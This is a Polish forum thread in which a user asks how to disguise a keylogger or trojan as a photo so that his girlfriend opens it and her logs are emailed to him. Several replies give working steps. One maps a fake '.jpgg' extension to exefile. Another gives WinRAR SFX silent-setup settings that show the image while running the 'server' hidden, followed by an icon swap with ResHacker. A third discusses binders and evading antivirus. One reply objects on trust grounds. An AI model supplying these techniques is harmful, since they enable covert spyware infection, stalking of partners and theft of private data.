jpg + exe

jacek.02.04.76

Użytkownik
Dołączył
Czerwiec 30, 2008
Posty
35
MAM PROŚBĘ

Robię takie coś , biorę jakieś zdięcie np x.jpg i jakiś plik exe np y.exe otwieram konsolę i wpisuję
copy /b x.jpg+y.exe wynik.jpg w skutek czego otrzymuję jpg-a takiego jak x.jpg i mogę go otwierać normalnie z exe-ekiem w środku. Czy mógłby ktoś doradzić jak zrobić żeby wraz z otwarciem tego jpg-a uruchamiał się także exe, w tym wypadku chodzi o jakiwegoś keylogera lub trojana. Proszę o pomoc.
 

Legalnl

Użytkownik
Dołączył
Październik 8, 2008
Posty
828
oczzywiscie da sie odpalic plik .jpg + .exe tak jak powiedział DjMentos binderem ale wted plik wynikowy (do odpalenia) bedzie miał rozszerzenie exe.

djMentos nie do konca sie nie da bo kiedyś sie tym bawiłem i mozna odpalic exe "na pozor" z obrazka ktory utworzysz sobie w rejestrze w HKEY_CLASS_ROOT, jak odpowiedzio pokombinujesz to wystarczy np utworzyc .jpgg
<
przypisac mu ikone obrazka .jpg i tam jakis opis a sposob otwierania przekleic z exe i po sprawie
<
tylko oczywiscie taki sposob wymaga konfiguracji na komputerze ktorym sie chce takie cos odpalic. PZDR
 

shoock12

Użytkownik
Dołączył
Styczeń 24, 2009
Posty
123
Plik *.bat
Kod:
@echo off
assoc .jpgg=exefile
Zmieniasz rozszerzenie z .exe na .jpgg
 

jacek.02.04.76

Użytkownik
Dołączył
Czerwiec 30, 2008
Posty
35
No dobra , to trochę z innej beczki , potrzebuję zrobić taki manewr. Chcę wysłać np. dziewczynie swoie zdięcie "kochanie zobacz to moje nowe....itd" ona je otwiera i widzi mnie na zdięciu , ale gdzieś tam w tle się coś uruchamia , w skutek czego ja dostaję na maila , jej logi itd. , Da się to zrobić? no i oczywiście jak? Warzne jest to że ma być właśnie to moje nieszczęsne zdięcie, a ona ma je widzieć.
 

maly3900

Użytkownik
Dołączył
Styczeń 18, 2005
Posty
362
Dokładnie Binder.

Kwestią Off-topu będzie to iż w związku najważniejsze jest zaufanie. Bez niego nic wam się nie uda. Widać - wy - musicie jeszcze nad tym popracować jak chcesz ją najnormalniej szpiegować. Oczywiście, nie znam całej sytuacji, lecz - taka moja opinia.
 

pacio123

Użytkownik
Dołączył
Lipiec 22, 2007
Posty
16
czytałem kiedyś ze server.exe może mieć końcówkę .jpg ale to trzeba w rejestrze zmieniać.
a co to daje jak byś musiał dodawać do ofiary komputera rejestr to bez użyteczne bo lepiej odrazu podesłać keyloggera nawet w exe
smile.gif
 
Ostatnio edytowane przez moderatora:

jacek.02.04.76

Użytkownik
Dołączył
Czerwiec 30, 2008
Posty
35
binder , binder , wszystkie jakie znalazłem w sieci się nie nadają , za każdym razem jak po zbindowaniu testuję antywirusem to drze morde że plik jest zainfekowany trojanem, są jakieś niewykrywalne albo co? sam bym sobie napisał takie coś ale ciemny jestem w tych sprawach i nie mam pojęcia jak to się robi. Można to jakoś inaczej zrobić ?
 

grzonu

Były Moderator
Dołączył
Grudzień 26, 2006
Posty
1390
no jesli sie samemu pisze program to mozna poprostu do niego dolozyc zeby sie pokazywalo zdjecie a jak sie nie pisze samemu to jedynie binder
 

butek123

Użytkownik
Dołączył
Marzec 26, 2009
Posty
12
binder , binder , wszystkie jakie znalazłem w sieci się nie nadają , za każdym razem jak po zbindowaniu testuję antywirusem to drze morde że plik jest zainfekowany trojanem, są jakieś niewykrywalne albo co? sam bym sobie napisał takie coś ale ciemny jestem w tych sprawach i nie mam pojęcia jak to się robi. Można to jakoś inaczej zrobić ?
Da się tak zrobić, następująco... załóżmy że masz plik serwer.exe i zdjecie.jpg
1. Zaznaczasz oba zdjęcia >PPM>Dodaj do archiwum (winrar)> Zaznacz UTWÓRZ ARCHIWUM SFX > ZMIEN NAZWE NA JAKĄ CHCESZ, MUSI ZOSTAĆ ROZSZERZENIE EXE! > przejdz do zakładki Komentarz> W polu "wpisz komentarz" wklej :


Silent=1
Setup=zdjecie.jpg
Setup=server.exe
Path=%tmp%\lokalizacja

Nacisnij ok, utworzy się archwium SFX które będzie otwierało zdjecie a następnie 'w ukryciu' serwer.
Potem wystarczy zmienić ikonę,
Polecam program- ResHacker
Ikonę jpg znajdziesz w C:\WINDOWS\system32\shimgvw.dll
Lub użyj programu do wyciągania ikon z programów
Polecam- extraico
 
Ostatnio edytowane przez moderatora:

jacek.02.04.76

Użytkownik
Dołączył
Czerwiec 30, 2008
Posty
35
dzięki , to akurat nie to co chciałem uzyskać , bo nadal to jest exe ale też dobre.
A jeżeli do archiwum chcę dożucić więcej plików exe np. serwer.exe, serwer1.exe, serwer2.exe to
komentarz ma być taki? :

Silent=1
Setup=zdjecie.jpg
Setup=server.exe
Setup=server1.exe
Setup=server2.exe
Path=%tmp%\lokalizacja

może to głupie pytanie , ale nie wiem węc pytam.
 
Ostatnio edytowane przez moderatora:
Do góry Bottom